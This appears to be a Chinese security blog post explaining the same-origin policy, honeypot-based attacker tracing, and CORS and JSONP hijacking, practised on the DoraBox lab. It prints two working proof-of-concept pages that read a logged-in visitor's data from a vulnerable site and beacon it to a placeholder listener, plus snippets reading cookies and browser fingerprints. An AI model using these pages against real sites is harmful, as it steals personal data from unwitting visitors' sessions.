一、同源策略

同源策略简而言之就是

协议、域名、端口都相同

同源策略是由Netscape提出的一个著名的安全策略，现在所有支持JavaScript的浏览器都会使用这个策略，同源策略用于限制从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。不同源的客户端脚本在没有明确授权的情况下，不能读写对方资源。（DOM、Cookie、三方插件以及XML HttpRequest），其中带src属性的标签不受同源策略的限制

这些标签不受同源策略影响

,</li> </ul> </li> </ul> </blockquote> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403241919961.jpg" alt="20"></p> <p>场景1：</p> <blockquote> <p>百度网盘能从百度中获取到登录信息</p> <p>CSDN不能从百度中获取到登录信息</p> </blockquote> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403241905672.jpg" alt="20"></p> <p>场景2：</p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403241909290.jpg" alt="21"></p> <p>同源策略测试：</p> <figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">req = new XMLHttpRequest() </span><br><span class="line">req.open("GET","https://www.baidu.com") </span><br><span class="line">req.send()</span><br></pre></td></tr></table></figure> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403241923735.png" alt="image-20240324192343691"></p> <p>如果<a target="_blank" rel="noopener" href="http://www.baidu.com存在跨域缺陷,同源策略就会杯打破./">www.baidu.com存在跨域缺陷，同源策略就会杯打破。</a></p> <h1 id="二、蜜罐溯源"><a href="#二、蜜罐溯源" class="headerlink" title="二、蜜罐溯源"></a>二、蜜罐溯源</h1><blockquote> <p>web蜜罐收集个人信息使用技术主要有两种，分别是JSONP跨域劫持和XSS。在学习jsonp之前，需要了解浏览器的同源策略</p> </blockquote> <p>蜜罐要做的就是找到很多网站的跨域漏洞，且这些跨域漏洞能够获取用户的信息，例如qq号、手机号、邮箱号、百度ID、微博ID、googleID、搜狗ID、360ID、联想ID等（如何时候公开厂商漏洞都属于违法行为，所有开源的漏洞都没有这个功能），如果踩到蜜罐的黑客浏览器中已经登录了这些网站，就会被获取到敏感信息，从而被溯源。</p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403241930288.jpg" alt="20"></p> <h1 id="三、跨域隐患"><a href="#三、跨域隐患" class="headerlink" title="三、跨域隐患"></a>三、跨域隐患</h1><h4 id="3-1、CORS"><a href="#3-1、CORS" class="headerlink" title="3.1、CORS"></a>3.1、CORS</h4><blockquote> <p>使用靶场DoraBox</p> </blockquote> <p>CORS是一个W3C标准，允许浏览器向跨域服务器发出的XMLHttpReques请求</p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242011215.png" alt="image-20240324201138172"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242011835.png" alt="image-20240324201155793"></p> <figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span> </span><br><span class="line"><span class="tag"><<span class="name">html</span>></span> </span><br><span class="line"><span class="tag"><<span class="name">head</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">title</span>></span>CORS TEST<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">id</span>=<span class="string">'output'</span>></span><span class="tag"></<span class="name">div</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">var</span> req = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>(); </span></span><br><span class="line"><span class="language-javascript"> req.<span class="property">onload</span> = reqListener; </span></span><br><span class="line"><span class="language-javascript"> req.<span class="title function_">open</span>(<span class="string">'get'</span>,<span class="string">'有CORS漏洞的网站'</span>,<span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="comment">//req.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");</span></span></span><br><span class="line"><span class="language-javascript"> req.<span class="property">withCredentials</span> =<span class="literal">true</span>;</span></span><br><span class="line"><span class="language-javascript"> req.<span class="title function_">send</span>();</span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">function</span></span></span><br><span class="line"><span class="language-javascript"> <span class="title function_">reqListener</span>(<span class="params"></span>){</span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">new</span> <span class="title class_">Image</span>().<span class="property">src</span>=<span class="string">"http://蜜罐服务器IP:10002/"</span>+ <span class="variable language_">window</span>.<span class="title function_">btoa</span>(<span class="built_in">unescape</span>(<span class="built_in">encodeURIComponent</span>(<span class="title class_">JSON</span>.<span class="title function_">stringify</span>(req.<span class="property">responseText</span>))))</span></span><br><span class="line"><span class="language-javascript"><span class="comment">// 要接收敏感信息的攻击机监听端口</span></span></span><br><span class="line"><span class="language-javascript">}; </span></span><br><span class="line"><span class="language-javascript"> </span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> <p>在这个html相同目录下开启python http服务，进行，访问蜜罐设置的地址，就可以获取到用户信息了</p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242014796.png" alt="image-20240324201425752"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242014893.png" alt="image-20240324201440855"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242015169.png" alt="image-20240324201505127"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242015393.png" alt="image-20240324201523350"></p> <p>使用base64解码后，就可以看到用户信息</p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242016573.png" alt="image-20240324201634530"></p> <h4 id="3-2、JSONP"><a href="#3-2、JSONP" class="headerlink" title="3.2、JSONP"></a>3.2、JSONP</h4><p>JSONP是JSON with padding（填充式JSON或参数式JSON），是一种为了跨域获取资源而产生的一种技术手段。这是一种非官方的协议</p> <h5 id="JSONP实现跨域的原理"><a href="#JSONP实现跨域的原理" class="headerlink" title="JSONP实现跨域的原理:"></a>JSONP实现跨域的原理:</h5><p> 同源策略限制了不同源的站点通过ajax获取信息，但是web页面调用js文件则不受跨域的影响并且凡是拥有src属性的标签都都可以跨域请求，如script，img等标签。JSON正是利用这种原理去实现跨域请求。</p> <h5 id="JSON劫持："><a href="#JSON劫持：" class="headerlink" title="JSON劫持："></a>JSON劫持：</h5><p> 从JSONP的原理中可以看出这种方式实现了数据的跨域访问，如果网站B对网站A的JSONP请求没有进行安全检查直接返回数据，则网站B 便存在JSONP 漏洞，网站A 利用JSONP漏洞能够获取用户在网站B上的数据。<br>这种漏洞与CSRF非常相似，只不过CSRF只是发送数据去达到一定的目的，而JSONP劫持是为了获取返回的敏感数据。</p> <figure class="highlight html"><table><tr><td class="code"><pre><span class="line">// jsonp 演示页面</span><br><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span> <span class="tag"><<span class="name">html</span> <span class="attr">lang</span>=<span class="string">"en"</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">head</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"UTF-8"</span>></span> </span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>JSONP EXP跨域测试<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">head</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">body</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">function</span> <span class="title function_">test</span>(<span class="params">json</span>){</span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">new</span> <span class="title class_">Image</span>().<span class="property">src</span>=<span class="string">"http://蜜罐服务器IP:10002/"</span>+ <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(json)<span class="comment">// 攻击机准备接收的地址和端口</span></span></span><br><span class="line"><span class="language-javascript"><span class="comment">//alert(JSON.stringify(json))</span></span></span><br><span class="line"><span class="language-javascript">} </span></span><br><span class="line"><span class="language-javascript"> </span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">src</span>=<span class="string">"有jsonp漏洞的网站url"</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242028478.png" alt="image-20240324202800423"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242028746.png" alt="image-20240324202848709"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242029824.png" alt="image-20240324202914773"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242030338.png" alt="image-20240324203010285"></p> <h1 id="四、JS获取敏感信息"><a href="#四、JS获取敏感信息" class="headerlink" title="四、JS获取敏感信息"></a>四、JS获取敏感信息</h1><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">// 获取当前访问页面的cookie信息</span><br><span class="line">document.cookie</span><br><span class="line">// 获取当前访问的url</span><br><span class="line">window.location.href</span><br><span class="line">// 获取当前访问的路径</span><br><span class="line">window.location.pathname</span><br><span class="line">// 加载新的页面</span><br><span class="line">window.location.assign("http://xxxx");</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">// navigator 对象（蜜罐）</span><br><span class="line">txt ="<p>浏览器代号: "+ navigator.appCodeName +"</p>";</span><br><span class="line">txt+="<p>浏览器名称: "+ navigator.appName +"</p>"; </span><br><span class="line">txt+="<p>浏览器版本: "+ navigator.appVersion +"</p>"; </span><br><span class="line">txt+="<p>启用Cookies: "+ navigator.cookieEnabled +"</p>"; </span><br><span class="line">txt+="<p>硬件平台: "+ navigator.platform +"</p>"; </span><br><span class="line">txt+="<p>用户代理: "+ navigator.userAgent +"</p>"; </span><br><span class="line">txt+="<p>用户代理语言: "+ navigator.language +"</p>";</span><br><span class="line"></span><br><span class="line">// 弹窗</span><br><span class="line">alert("hello");</span><br><span class="line">// 确认弹窗</span><br><span class="line">confirm("xxx");</span><br><span class="line">// 输入框</span><br><span class="line">prompt("请输入你的名字","Harry Potter");</span><br></pre></td></tr></table></figure> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242034405.png" alt="image-20240324203423356"></p> <p><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202403242034647.png" alt="image-20240324203457611"></p> </article><div class="post-copyright"><div class="post-copyright__title"><span class="post-copyright-info"><h>蜜罐溯源</h></span></div><div class="post-copyright__type"><span class="post-copyright-info"><a href="https://w0dao.cn/posts/6S4YFR.html">https://w0dao.cn/posts/6S4YFR.html</a></span></div><div class="post-copyright-m"><div class="post-copyright-m-info"><div class="post-copyright-a"><h>作者</h><div class="post-copyright-cc-info"><h>w0dao</h></div></div><div class="post-copyright-c"><h>发布于</h><div class="post-copyright-cc-info"><h>2024-03-24</h></div></div><div class="post-copyright-u"><h>更新于</h><div class="post-copyright-cc-info"><h>2024-03-24</h></div></div><div class="post-copyright-c"><h>许可协议</h><div class="post-copyright-cc-info"><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a rel="noopener" target="_blank" title="CC BY-NC-SA 4.0" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a></div></div></div></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/">应急响应</a><a class="post-meta__tags" href="/tags/%E6%BA%AF%E6%BA%90/">溯源</a></div><div class="post_share"><div class="social-share" data-image="/img/b11.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/1CRD4E9.html" title="威胁情报和IP地位"><img class="cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/b12.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">威胁情报和IP地位</div></div></a></div><div class="next-post pull-right"><a href="/posts/3DE375T.html" title="Wireshark和tcpdump"><img class="cover" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/b13.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Wireshark和tcpdump</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="card-info-avatar"><div class="avatar-img"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/avatar.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-status-box"><div class="author-status"><g-emoji class="g-emoji" alias="palm_tree" fallback-src="https://lskypro.acozycotage.net/LightPicture/2022/12/fe1dc0402e623096.jpg">🐟</g-emoji><span>认真摸鱼中</span></div></div></div><div class="author-info__name">w0dao</div><div class="author-info__description">不破不立</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">49</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">14</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content"></div><div id="welcome-info"></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5"><span class="toc-text">一、同源策略</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E8%9C%9C%E7%BD%90%E6%BA%AF%E6%BA%90"><span class="toc-text">二、蜜罐溯源</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E8%B7%A8%E5%9F%9F%E9%9A%90%E6%82%A3"><span class="toc-text">三、跨域隐患</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#3-1%E3%80%81CORS"><span class="toc-text">3.1、CORS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-2%E3%80%81JSONP"><span class="toc-text">3.2、JSONP</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#JSONP%E5%AE%9E%E7%8E%B0%E8%B7%A8%E5%9F%9F%E7%9A%84%E5%8E%9F%E7%90%86"><span class="toc-text">JSONP实现跨域的原理:</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#JSON%E5%8A%AB%E6%8C%81%EF%BC%9A"><span class="toc-text">JSON劫持：</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%9B%E3%80%81JS%E8%8E%B7%E5%8F%96%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF"><span class="toc-text">四、JS获取敏感信息</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/3CVGCH3.html" title="cereal"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/b16.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="cereal"/></a><div class="content"><a class="title" href="/posts/3CVGCH3.html" title="cereal">cereal</a><time datetime="2024-09-19T09:12:49.378Z" title="发表于 2024-09-19 17:12:49">2024-09-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/3CXKNHG.html" title="GeminiLnc-Pentest-v2"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/b3.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="GeminiLnc-Pentest-v2"/></a><div class="content"><a class="title" href="/posts/3CXKNHG.html" title="GeminiLnc-Pentest-v2">GeminiLnc-Pentest-v2</a><time datetime="2024-09-09T16:00:00.000Z" title="发表于 2024-09-10 00:00:00">2024-09-10</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/1N7DVAF.html" title="DarkHole_2"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/b10.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="DarkHole_2"/></a><div class="content"><a class="title" href="/posts/1N7DVAF.html" title="DarkHole_2">DarkHole_2</a><time datetime="2024-09-08T09:17:13.614Z" title="发表于 2024-09-08 17:17:13">2024-09-08</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/2D4458D.html" title="GeminiLnc-Pentest"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/b7.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="GeminiLnc-Pentest"/></a><div class="content"><a class="title" href="/posts/2D4458D.html" title="GeminiLnc-Pentest">GeminiLnc-Pentest</a><time datetime="2024-09-07T08:29:27.125Z" title="发表于 2024-09-07 16:29:27">2024-09-07</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/294KW2Z.html" title="narak"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/b3.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="narak"/></a><div class="content"><a class="title" href="/posts/294KW2Z.html" title="narak">narak</a><time datetime="2024-09-04T01:46:07.266Z" title="发表于 2024-09-04 09:46:07">2024-09-04</time></div></div></div></div></div></div></main><footer id="footer" style="background: transparent"><div id="footer-wrap"><div class="copyright">©2023 - 2024 By w0dao</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a><br> <img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://wudao3579.oss-cn-beijing.aliyuncs.com/image/202401082132113.png"> <a href="https://beian.miit.gov.cn/#/Integrated/index" style="color:white" target="_blank">豫ICP备2024041659号-1</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i><span id="percent">0<span>%</span></span></button><button id="go-down" type="button" title="直达底部" onclick="btf.scrollToDest(document.body.scrollHeight, 500)"><i class="fas fa-arrow-down"></i></button></div></div><div><script src="/js/utils.js?v=4.12.0"></script><script src="/js/main.js?v=4.12.0"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.32/dist/fancybox/fancybox.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@17.8.5/dist/lazyload.iife.min.js"></script><div class="js-pjax"></div><script async src="//npm.elemecdn.com/pace-js@1.2.4/pace.min.js"></script><script defer data-pjax src="/js/readPercent.js"></script><script src="https://cdn.staticfile.org/jquery/3.6.3/jquery.min.js"></script><script async data-pjax src="/js/txmap.js"></script><script async src="/js/fps.js"></script><script async src="/js/title.js"></script><canvas class="fireworks" mobile="true"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/dist/fireworks.min.js"></script><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/dist/canvas-nest.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true; POWERMODE.shake = false; POWERMODE.mobile = true; document.body.addEventListener('input', POWERMODE); </script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span> 数据库加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div><div id="local-search-stats-wrap"></div></div></div><div id="search-mask"></div><script src="/js/search/local-search.js?v=4.12.0"></script></div></div></body></html>